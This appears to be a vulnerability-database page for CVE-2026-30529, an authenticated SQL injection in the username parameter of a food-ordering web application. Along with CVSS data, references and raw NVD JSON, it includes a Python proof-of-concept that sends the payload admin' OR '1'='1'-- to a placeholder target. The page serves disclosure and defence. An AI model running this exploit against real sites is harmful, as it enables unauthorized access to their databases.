CVE-2026-30529

Description

A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_user action). The application fails to properly sanitize user input supplied to the "username" parameter. This allows an authenticated attacker to inject malicious SQL commands.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Online Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL example
target_url = "http://target.com/Actions.php"

# Malicious payload for username parameter
payload = {
    "action": "save_user",
    "username": "admin' OR '1'='1'--", # SQL Injection payload
    "password": "test123"
}

# Cookies for authenticated session (Required as PR:L)
cookies = {
    "PHPSESSID": "authenticated_session_id_here"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("Request sent successfully.")
        print("Response:", response.text)
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30529
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30529
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30529/
[4] VulDB https://vuldb.com/cve/CVE-2026-30529
[5] https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveUser-username.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30529", "sourceIdentifier": "[email protected]", "published": "2026-03-27T16:16:23.447", "lastModified": "2026-03-30T17:21:20.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_user action). The application fails to properly sanitize user input supplied to the \"username\" parameter. This allows an authenticated attacker to inject malicious SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FAA9C4A-10ED-4AA4-8295-F4324DD2F879"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveUser-username.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}